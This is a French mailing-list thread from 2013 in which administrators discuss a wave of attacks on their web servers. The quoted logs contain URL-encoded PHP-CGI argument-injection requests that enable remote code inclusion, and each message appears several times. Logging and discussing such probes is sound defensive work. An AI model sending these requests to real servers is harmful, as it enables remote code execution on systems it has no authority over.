C'est seulement chez moi, ou on observe une recrudescence d'attaque
de script kiddie ?
[Mon Dec 16 19:34:30 2013] [error] [client 31.210.106.39] malformed header from script. Bad header=<b>Security Alert!</b> The PHP: php
C'est seulement chez moi, ou on observe une recrudescence d'attaque
de script kiddie ?
[Mon Dec 16 19:34:30 2013] [error] [client 31.210.106.39] malformed header from script. Bad header=<b>Security Alert!</b> The PHP: php
C'est seulement chez moi, ou on observe une recrudescence d'attaque
de script kiddie ?
[Mon Dec 16 19:34:30 2013] [error] [client 31.210.106.39] malformed header from script. Bad header=<b>Security Alert!</b> The PHP: php
On Mon, 16 Dec 2013 20:42:22 +0100
steve wrote:
Rien chez moi, mais bon, c'est réellement "chez moi"
(auto-hébergement s/ ADSL).
On Mon, 16 Dec 2013 20:42:22 +0100
steve <dlist@bluewin.ch> wrote:
Rien chez moi, mais bon, c'est réellement "chez moi"
(auto-hébergement s/ ADSL).
On Mon, 16 Dec 2013 20:42:22 +0100
steve wrote:
Rien chez moi, mais bon, c'est réellement "chez moi"
(auto-hébergement s/ ADSL).
On Mon, Dec 16, 2013 at 08:42:22PM +0100, steve wrote:
> C'est seulement chez moi, ou on observe une recrudescence d'attaque
> de script kiddie ?
Rien d'évident chez moi.
> [Mon Dec 16 19:34:30 2013] [error] [client 31.210.106.39] malformed header from script. Bad header=<b>Security Alert!</b> The PHP: php
Pas de PHP chez moi, mais en général ça n'arrête pas nos
hooligans du net...
On Mon, Dec 16, 2013 at 08:42:22PM +0100, steve wrote:
> C'est seulement chez moi, ou on observe une recrudescence d'attaque
> de script kiddie ?
Rien d'évident chez moi.
> [Mon Dec 16 19:34:30 2013] [error] [client 31.210.106.39] malformed header from script. Bad header=<b>Security Alert!</b> The PHP: php
Pas de PHP chez moi, mais en général ça n'arrête pas nos
hooligans du net...
On Mon, Dec 16, 2013 at 08:42:22PM +0100, steve wrote:
> C'est seulement chez moi, ou on observe une recrudescence d'attaque
> de script kiddie ?
Rien d'évident chez moi.
> [Mon Dec 16 19:34:30 2013] [error] [client 31.210.106.39] malformed header from script. Bad header=<b>Security Alert!</b> The PHP: php
Pas de PHP chez moi, mais en général ça n'arrête pas nos
hooligans du net...
T'as un « chez-toi » en dehors du monde ?
(je peux venir ?)
T'as un « chez-toi » en dehors du monde ?
(je peux venir ?)
T'as un « chez-toi » en dehors du monde ?
(je peux venir ?)
Salut,
C'est seulement chez moi, ou on observe une recrudescence d'attaque
de script kiddie ? Exemples tiré du syslog:
31.210.106.39 - - [16/Dec/2013:19:34:30 +0100] "POST
//%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F70%72%65%70%65%6E%64
%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1"
500 799
"-" "-"
89.136.120.205 - - [16/Dec/2013:19:59:06 +0100] "POST
//%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64
%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1"
500 799 "-" "-"
[Mon Dec 16 19:34:30 2013] [error] [client 31.210.106.39] malformed
header from script. Bad header=<b>Security Alert!</b> The PHP: php
[Mon Dec 16 19:59:06 2013] [error] [client 89.136.120.205] malformed
header from script. Bad header=<b>Security Alert!</b> The PHP: php
Depuis un mois ou deux ça n'arrête pas. Pareil chez vous? (j'adore le
« Security Alert » )
Bien à vous
s.
Salut,
C'est seulement chez moi, ou on observe une recrudescence d'attaque
de script kiddie ? Exemples tiré du syslog:
31.210.106.39 - - [16/Dec/2013:19:34:30 +0100] "POST
//%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F70%72%65%70%65%6E%64
%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1"
500 799
"-" "-"
89.136.120.205 - - [16/Dec/2013:19:59:06 +0100] "POST
//%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64
%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1"
500 799 "-" "-"
[Mon Dec 16 19:34:30 2013] [error] [client 31.210.106.39] malformed
header from script. Bad header=<b>Security Alert!</b> The PHP: php
[Mon Dec 16 19:59:06 2013] [error] [client 89.136.120.205] malformed
header from script. Bad header=<b>Security Alert!</b> The PHP: php
Depuis un mois ou deux ça n'arrête pas. Pareil chez vous? (j'adore le
« Security Alert » )
Bien à vous
s.
Salut,
C'est seulement chez moi, ou on observe une recrudescence d'attaque
de script kiddie ? Exemples tiré du syslog:
31.210.106.39 - - [16/Dec/2013:19:34:30 +0100] "POST
//%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F70%72%65%70%65%6E%64
%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1"
500 799
"-" "-"
89.136.120.205 - - [16/Dec/2013:19:59:06 +0100] "POST
//%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64
%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1"
500 799 "-" "-"
[Mon Dec 16 19:34:30 2013] [error] [client 31.210.106.39] malformed
header from script. Bad header=<b>Security Alert!</b> The PHP: php
[Mon Dec 16 19:59:06 2013] [error] [client 89.136.120.205] malformed
header from script. Bad header=<b>Security Alert!</b> The PHP: php
Depuis un mois ou deux ça n'arrête pas. Pareil chez vous? (j'adore le
« Security Alert » )
Bien à vous
s.
On Mon, 16 Dec 2013 20:42:22 +0100
steve wrote:
Rien chez moi, mais bon, c'est réellement "chez moi"
(auto-hébergement s/ ADSL).
On Mon, 16 Dec 2013 20:42:22 +0100
steve <dlist@bluewin.ch> wrote:
Rien chez moi, mais bon, c'est réellement "chez moi"
(auto-hébergement s/ ADSL).
On Mon, 16 Dec 2013 20:42:22 +0100
steve wrote:
Rien chez moi, mais bon, c'est réellement "chez moi"
(auto-hébergement s/ ADSL).
Wai, ben justement, si je poste, c'est que j'observe que ce
n'est pas le cas. Au moment même où j'écris, les attaques
continuent. Sinon, je ne posterais pas.
Wai, ben justement, si je poste, c'est que j'observe que ce
n'est pas le cas. Au moment même où j'écris, les attaques
continuent. Sinon, je ne posterais pas.
Wai, ben justement, si je poste, c'est que j'observe que ce
n'est pas le cas. Au moment même où j'écris, les attaques
continuent. Sinon, je ne posterais pas.
On Mon, 16 Dec 2013 21:27:57 +0100
steve wrote:
> T'as un « chez-toi » en dehors du monde ?
Nan, je pensais à la différence entre gros hébergeur pro
et @home; en Gal, l'hébergeur est plus attaqué parce que
le rapport effort/résultat est plus juteux.
> (je peux venir ?)
Tout dépend, si tu es une fille de moins de 40 ans, 85/55/80,
mignonne et un peu vicieuse, alors ça peut s'envisager.
On Mon, 16 Dec 2013 21:27:57 +0100
steve <dlist@bluewin.ch> wrote:
> T'as un « chez-toi » en dehors du monde ?
Nan, je pensais à la différence entre gros hébergeur pro
et @home; en Gal, l'hébergeur est plus attaqué parce que
le rapport effort/résultat est plus juteux.
> (je peux venir ?)
Tout dépend, si tu es une fille de moins de 40 ans, 85/55/80,
mignonne et un peu vicieuse, alors ça peut s'envisager.
On Mon, 16 Dec 2013 21:27:57 +0100
steve wrote:
> T'as un « chez-toi » en dehors du monde ?
Nan, je pensais à la différence entre gros hébergeur pro
et @home; en Gal, l'hébergeur est plus attaqué parce que
le rapport effort/résultat est plus juteux.
> (je peux venir ?)
Tout dépend, si tu es une fille de moins de 40 ans, 85/55/80,
mignonne et un peu vicieuse, alors ça peut s'envisager.
Fail2ban ne va pas arrêter cela, il va simplement éviter que les
logs s'alourdissent. Mais je m'en tape finalement. Entre les
lignes, je me demandais s'il n'existait pas un zero-day qui traîne
dans la nature, ce qui *pourrait* expliquer cette
recrudescence..You know ?
Fail2ban ne va pas arrêter cela, il va simplement éviter que les
logs s'alourdissent. Mais je m'en tape finalement. Entre les
lignes, je me demandais s'il n'existait pas un zero-day qui traîne
dans la nature, ce qui *pourrait* expliquer cette
recrudescence..You know ?
Fail2ban ne va pas arrêter cela, il va simplement éviter que les
logs s'alourdissent. Mais je m'en tape finalement. Entre les
lignes, je me demandais s'il n'existait pas un zero-day qui traîne
dans la nature, ce qui *pourrait* expliquer cette
recrudescence..You know ?